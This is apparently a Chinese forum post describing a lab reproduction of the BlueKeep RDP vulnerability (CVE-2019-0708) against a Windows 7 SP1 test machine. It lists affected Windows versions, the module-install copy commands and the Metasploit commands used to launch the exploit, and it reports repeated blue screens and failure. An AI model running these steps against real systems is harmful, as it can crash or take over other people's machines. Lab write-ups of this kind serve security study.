人工智能 cve-2019-0708远程桌面代码执行漏洞复现

karina3jg · June 12, 2020 · 8 hits

影响范围

  • Windows 2000 x86 (All Service Packs))
  • Windows XP x86 (All Service Packs))
  • Windows 2003 x86 (All Service Packs))
  • Windows 7 x86 (All Service Packs))
  • Windows 7 x64 (All Service Packs)
  • Windows 2008 R2 x64 (All Service Packs)

惊现 CVE-2019-0708 EXP

​2019年9月7日,Metasploit 官方更新了CVE-2019-0708 的利用模块,一时间各大安全媒体炸开了锅,群里好多大佬也开始转发这个消息,exploit 模块的初始 PR 针对 64 位版本的 Windows 7 和 Windows 2008 R2,默认情况下,Metesploit 中的 BlueKeep 漏洞仅仅识别目标操作系统版本以及目标是否可能易受攻击.该漏洞不支持自动定位,需要在攻击前手动设定目标的详细信息.如果模块在利用期间中断,或者指定了不正确的目标,那目标将会蓝屏,还应注意的是,Windows 的服务器设置还需要非默认配置才能利用,即更改注册表设置以启动音频共享,将来可能会删除这个限制.

所以说这个 exp 并不是非常的稳定,大概率会出现蓝屏的情况.

漏洞复现

攻击机:Kali IP:10.10.10.129

靶机:Windows 7 SP1 IP:10.10.10.128

过程

首先下载攻击模块,将相应的文件移到如下文件夹

1
2
3
4
cp rdp.rb  /usr/share/metasploit-framework/modules/exploit/windows/rdp/rdp.rb
cp rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
cp cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
cp cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

没有的目录就自己创建一下

启动 msf 加载新加入的模块

1
2
msfconsole                #启动
load_all #重新载入模块

选择攻击模块进行攻击

1
2
3
4
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set RHOST 10.10.10.128
set target 3 #根据实际情况进行选择
exploit #开始攻击

因为该攻击模块并不稳定,所以很容易导致靶机蓝屏,下面就是攻击失败的情况

攻击开始后查看靶机的任务管理器,可以很明显的看到物理内存的使用率不断增加

1568013185914

然后一会就蓝屏了

1568011275740

最后试了好多次,依旧是蓝屏,蓝屏漏洞,果然名不虚传,看到一些视频也是会蓝屏很多次,最后下载了个一个原版的 Win7 SP1 系统,根据 github 上大佬的提示,修改了内核数量,最终还是一直蓝屏。

还是等到 exp 完善后再重新复现吧。

参考

0708MSF 攻击套件安装

CVE_2019_0708 详细复现

惊现 CVE-2019-0708 EXP 惊醒睡梦中的安全圈

CVE-2019-0708 远程桌面代码执行漏洞复现

No Reply at the moment.
You need to Sign in before reply, if you don't have an account, please Sign up first.